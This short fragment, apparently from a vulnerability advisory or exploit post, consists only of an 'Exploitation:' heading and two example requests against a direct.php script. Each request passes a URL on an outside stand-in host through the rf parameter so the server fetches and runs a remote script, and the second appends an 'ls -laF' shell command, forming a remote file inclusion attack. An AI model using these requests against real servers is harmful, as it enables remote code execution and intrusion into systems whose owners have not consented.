Exploitation:
/direct.php?rf=http://www.yourspace.com/yourscript.php? /direct.php?rf=http://www.yourspace.com/yourscript.txt?&ls%20-laF